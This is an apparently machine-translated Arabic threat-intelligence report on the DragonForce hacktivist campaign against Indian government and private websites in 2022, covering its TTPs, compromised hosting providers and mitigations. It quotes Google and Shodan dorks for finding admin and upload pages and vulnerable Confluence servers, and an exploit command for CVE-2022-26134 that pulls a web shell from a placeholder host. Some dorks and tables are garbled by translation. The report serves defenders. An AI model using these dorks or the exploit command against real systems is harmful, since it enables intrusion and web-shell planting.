الفئة:
استخبارات الخصم
الصناعة:
متعدد
التحفيز:
الهاكتيفية
البلد:
الهند
ملخص تنفيذي
تهديدتأثيرتخفيف
- تستهدف DragonForce بنشاط الكيانات الهندية تحت #OpsPatuk و #OpsIndia.
- وقد انضمت إلى الحملة مجموعات من الجهات الفاعلة في مجال التهديد من باكستان وتركيا وفلسطين.
- خرق بعض المواقع الحكومية الحساسة التي تحتوي على معلومات تحديد الهوية الشخصية والعمليات العسكرية والأسرار الحكومية الأخرى.
- تطبيق تقنيات مكافحة DDoS
- استخدم معدات شبكة مصممة خصيصًا.
- يجب أن يكون مقدمو خدمات استضافة الإنترنت وفرق الاستجابة الإلكترونية الحكومية في حالة تأهب قصوى.
التحليل والإسناد
معلومات من وسائل التواصل الاجتماعي
- في 10 يونيو 2022، كلاود سيكمنصة المخاطر الرقمية السياقية للذكاء الاصطناعي الجيل السادس عشر اكتشفت تغريدة نشرتها مجموعة الهاكرز الماليزية، دراغون فورس، تدعو إلى شن هجمات على مواقع الحكومة الهندية من قبل قراصنة مسلمين في جميع أنحاء العالم.
- كان الهدف الأساسي للمجموعة من الهجوم هو الرد على الحكومة الهندية بسبب التعليقات المثيرة للجدل حول النبي محمد من قبل بعض السياسيين الهنود.
- ومنذ ذلك الحين، قامت الجماعة ومؤيدوها بتعريض أكثر من 3000 منظمة حكومية وغير حكومية ومواقع عسكرية وكيانات خاصة للخطر.
- تشمل الكيانات المخترقة حزب BJP (الحزب الحاكم في الهند)، والمواقع الإلكترونية للمحاربين القدامى في الجيش، والمعاهد الأكاديمية، وما إلى ذلك.
حول خوادمهم
- تستخدم المجموعة خادمي DNS، «أنابيل.ns.cloudflare.com» و «نيكولاس.ns.cloudflare.com» حيث تمثل 104.21.35.227 و172.67.180.87 عناوين IP للخوادم على التوالي.
- تم اكتشاف أن نطاق DragonForce تمت استضافته جنبًا إلى جنب مع العديد من مواقع الويب الروسية والأسترالية والصينية وغيرها إلى جانب العديد من نطاقات البالغين.
التقنيات والتكتيكات والإجراءات (TTPs)
نواقل الهجوم الأساسية الثلاثة التي تستخدمها المجموعة ومؤيدوها هي كما يلي وكما هو موضح في مخطط التدفق:
- جوجل دوركينج
- شودان دوركس
- هجمات DDoS
[معرف التسمية التوضيحية = «المرفق 20079" align= «aligncenter» width="1931"]

مخطط تدفق يوضح نظرة عامة على TTP المستخدمة من قبل مجموعة DragonForce وشركائها [/caption]
جوجل دوركس
- Google Dorks هي المصدر الأساسي لأهداف المجموعة، وهو ما تم تأكيده من الصورة التالية لفيديو Tiktok الذي تم إنشاؤه بواسطة أحد حلفاء DragonForce:
[معرف التسمية التوضيحية = «المرفق 20080" align= «aligncenter» العرض = «410"]

صورة من فيديو PoC لأحد شركاء DragonForce يكشف عن Google Dorks في البحث [/caption]
- تضمنت قائمة Google Dorks الحمقى للعثور على مؤسسات تعليمية مختلفة، حيث تم العثور على الحمقى المرتبطين بتسجيل الدخول الأكاديمي والحرم الجامعي.
- تحتوي القائمة الكاملة على حوالي 360 google dorks والتي كان من الممكن إساءة استخدامها للعديد من الأغراض الضارة. تم ذكر بعض الحمقى المهمين من القائمة:
جوجل دوركسعنوان URL: /المشرف/التحميل/ : وزارة المعرفة ومشاركة الموارد
عنوان URL: مشرف /login/login.php: لتسجيل دخول المشرف إلى مواقع الويب باستخدام لغة PHP
«أنواع الملفات المسموح بها: موقع png gif jpg tx:gov.in» : جوجل دورك لتحميل ملفات shell html إلى الخادم
php؟ معرف = الموقع: في: المواقع الهندية التي تحتوي على معلمة معرف يمكن إساءة استخدامها ويمكن إجراء معالجة لعناوين URL
سنترول/دقيقة= تسجيل الدخول إلى الحرم الجامعي : المؤسسات الأكاديمية التي تستخدم معامل تسجيل الدخول إلى الحرم الجامعي
inurl/mnux = تسجيل الدخول الأكاديمي: المؤسسات الأكاديمية ذات معامل تسجيل الدخول الأكاديمي
inurl/mnux = تسجيل الدخول الأكاديمي الإداري: المؤسسات الأكاديمية ذات معامل تسجيل الدخول الأكاديمي الإداري
عنوان الموقع الإلكتروني: /admin/cp.php: يكشف عن جميع المواقع باستخدام لوحة التحكم التي يمكن أن توفر الوصول إلى الخادم.
عنوان URL: admin/upload.php: بالنسبة للمواقع التي تحتوي على ميزة التحميل التي يمكن للممثلين استغلالها من أجل shell باستخدام تشويه النص البرمجي
ثغرة شودان دوركس وأتلاسيان كونفونس
- تمت مشاركة PoC لاستغلال ثغرة Atlassian Confluence جنبًا إلى جنب مع نقاط ضعف Shodan dork لـ Confluence Server التي تستهدف المنطقة الهندية.
شودان دورك: https://favicon.hash: -305179312 البلد: «الهند»
- شارك الممثل أيضًا برنامج نصي لمستودع GitHub يمكن تنزيله واستغلاله باستخدام أمر python التالي:
CVE-2022-26134.py http://targets.com «احصل على https://site.com/shell.txt -O DFM.php
هجمات DDoS (فيضان HTTP)
- دعت المجموعة أعضائها والمستخدمين الآخرين في المنتدى لإجراء هجوم DDoS حيث شاركوا رسمًا بيانيًا يوضح موقع الويب وعناوين IP ومنفذ الهدف.
[معرف التسمية التوضيحية = «المرفق _20081" aligncenter «العرض ="815"]

إنفوجرافيك مشترك من قبل مجموعة دراغون فورس لـ OpsIndia/Opspatuk [/caption]
- استخدمت المجموعة أداة تسمى HTTPFLOOD (المعروف أيضًا باسم «./404 FOUND.MY»)، الذي يتلاعب وينشر الطلبات غير المرغوب فيها لإسقاط خادم ويب أو تطبيق. تم تصميم الأداة بلغة Python وتتطلب المدخلات الثلاثة التالية:
- عنوان URL مستهدف
- قائمة بروكسي
- عدد سلاسل الرسائل (أي عدد الطلبات التي سيتم إرسالها إلى الخادم)
- وجد التحليل الإضافي أن المستخدم «SKYSG404" قام ببناء أداة HTTPFLOOD، وأنه تم إنشاء كل من الأداة وحساب Github الذي يستضيفها في 12 يونيو 2022.
[معرف التسمية التوضيحية = «المرفق _20082" aligncenter «العرض ="1920"]

لقطة شاشة لحساب جيثب الذي يستضيف HTTPFLOOD (./404found.my) [/caption]
خوادم مخترقة
- وقد لوحظ أن عددًا كبيرًا من المجالات التي يتم استهدافها، تم حلها إلى عنوان IP مشترك حيث تمت استضافتها.
- يبدو أن المهاجمين قد تمكنوا من الوصول إلى الخادم عبر ثغرة حقن على أحد مواقع الويب.
- بمجرد اختراق الخادم، تقع جميع مواقع الويب المستضافة عليه بسهولة فريسة للمهاجمين، كما هو موضح في المخطط الدائري أدناه.
[معرف التسمية التوضيحية = «المرفق _20083" align= «aligncenter» width="809"]

مخطط دائري يوضح عنوان IP الشائع الذي تتم مشاركته بواسطة أسماء نطاقات متعددة [/caption]
- كما هو موضح في الجدول أدناه، فإن ما يقرب من 61٪ من النطاقات المخترقة تنتمي إلى شبكات E2e.in التي يقع مقرها في دلهي، الهند.
- تنتمي شريحة كبيرة أخرى، 20.8٪، من النطاقات المخترقة إلى شركة أتريا لتقنيات التقارب المحدودة.
- بشكل مشترك، يشكل كل من مزودي خدمة الإنترنت حوالي 81٪ من مواقع الويب المخترقة.
حصة أسماء النطاقات التي يتم حلها وفقًا لمعلومات IP الشائعة وموفر خدمة الإنترنت
الملكية الفكريةالنسبة المئويةالموقعاسم مزود خدمة الإنترنت164.52.212.5840.1 سعيد آباد، نيودلهي، الهند 2 شبكات. في 216.48.179.6020.8 سعيد آباد، نيودلهي، الهند 2 شبكات. في 183.83.180.22620.8
لكناو، أوتار براديش، الهند أتريا كونفيرانس تكنولوجيز pvt ltd120.138.4.2188.2 فالساد، غوجارات، الهند Greenet103.115.194.394.8 مومباي، مركز بيانات Indianet Magic في مومباي
التأثير والتخفيف
التأثيرالتخفيف
- يمكن أن يؤدي تصعيد مثل هذه الحملات على المستوى العالمي إلى عواقب وخيمة على الحكومة والكيانات الهندية.
- ستزود البيانات المكشوفة الجهات الفاعلة الخبيثة بالتفاصيل المطلوبة لشن هجمات معقدة.
- يمكن أن تؤدي الهجمات على البنية التحتية الدفاعية إلى اختراق المعلومات الحساسة والتسبب في مشكلة تتعلق بالأمن القومي.
- قم بتصحيح نقاط النهاية الضعيفة والقابلة للاستغلال.
- راقب الحالات الشاذة في حسابات المستخدمين وتطبيقات الويب المعرضة للإنترنت، مع الإشارة إلى عمليات الاستحواذ المحتملة على الحسابات.
- قم بمسح المستودعات لتحديد بيانات الاعتماد والأسرار المكشوفة.
- راقب منتديات الجرائم الإلكترونية للحصول على أحدث التكتيكات التي تستخدمها الجهات الفاعلة في مجال التهديد.
المراجع
الملحق
[معرف التسمية التوضيحية = «المرفق 20084" align= «aligncenter» width="1366"]

تعطل خادم موقع جامعة مومباي في أعقاب هجوم DDOS [/caption]
[معرف التسمية التوضيحية = «المرفق 20085" align= «aligncenter» العرض = «1280"]

إنفوجرافيك مشترك من قبل مجموعة دراغون فورس لـ OPSIsrael/OpsBedil [/caption]
[معرف التسمية التوضيحية = «المرفق 20086" align= «aligncenter» width="1326"]

annabel.ns.cloudflare.com خادم DNS مع 2110 نطاقًا مستضافًا. [/التسمية التوضيحية]
[معرف التسمية التوضيحية = «المرفق _20087" aligncenter «العرض = «1207"]

nicolas.ns.cloudflare.com خادم DNS مع 3909 نطاقًا مستضافًا. [/التسمية التوضيحية]